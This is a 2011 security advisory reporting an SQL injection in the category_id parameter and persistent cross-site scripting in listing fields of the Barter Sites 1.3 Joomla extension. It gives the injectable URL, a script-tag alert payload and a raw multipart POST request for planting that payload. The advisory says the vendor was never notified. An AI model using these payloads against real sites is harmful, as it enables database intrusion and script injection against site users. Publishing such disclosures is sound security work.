####################################################################################
Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities
####################################################################################

Release Date Bug.          28-Oct-2011
Date Added.                01-Oct-2011
Vendor Notification Date.  Never
Product.                   Barter Sites
Platform.                  Joomla
Affected versions.         1.3
Type.                      Commercial
Price.                     $99
Attack Vector.             Sql Injection & Persistent XSS
Solution Status.           unpublished
CVE reference.             Not yet assigned
Download.                  www.barter-sites.com/content/getStarted



I. BACKGROUND

The Barter Sites extension is for operating a trade group.
Members post listings in the barter directory on your site,
send each other offers and messages, negotiate, and 'pay'
with either direct trade or with your own private digital
currency called trade credits. You can even issue lines of
credit.

Admin has the option to earn commissions on trade credit
transfers and can run transactions for the members, serving
as a barter broker.

Features Include:

* HTML Listings
* Barter Wish-list
* Direct Trade Offers
* Virtual Private Currency
* Trade Credit Transfers
* Admin Broker/Transfer
* Generate Invoices
* Paypal Commissions
* Member Reputations
* Private Messaging
* and more!

II. DESCRIPTION

Two vulnerabilities discovered
- Category_id Parameter SQL injection
- XSS in several places


III.  EXPLOITATION

*INJECTION SQL

parameter [category_id]:

/index.php?option=com_listing&task=browse&category_id=1[SQL]

[SQL]=Injection Sql


*Persistent XSS main

Register->> Login ---> barter>Post: or /index.php?option=com_listing&task=post&Itemid=2
Listing Title: <IMG """><SCRIPT>alert("XSS")</SCRIPT>
selection  category.

XSS look at: barter>selection  category

---->To view the xss is not necessary to be registered


*Persistent XSS side

In the form of the Post, you can insert xss in all settings:
-Website Address
-Payment types accepted
-Sell Price
-Shipping Cost
-Quantity
all can be inserted into the header, but for Facilides directly on the form

all: <IMG """><SCRIPT>alert("XSS")</SCRIPT>



*Persistent XSS in pictures

If you prefer pictures to insert in the xss edit header values as follows:

Get:/index.php?option=com_listing&task=listingsave
Post:

-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="listing_title"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="description"\r\n
\r\n
<p><IMG """><SCRIPT>alert("XSS")</SCRIPT></p>\r\n  <-----------------------------------click here
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="homeurl"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="category_id"\r\n
\r\n
34\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="paystring"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="sell_price"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="shipping_cost"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="quantity"\r\n
\r\n
\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="submit"\r\n
\r\n
Submit\r\n
-----------------------------106542362324353\r\n
Content-Disposition: form-data; name="listing_id"\r\n
\r\n
\r\n
-----------------------------106542362324353--\r\n


Discovered by.
Chris Russell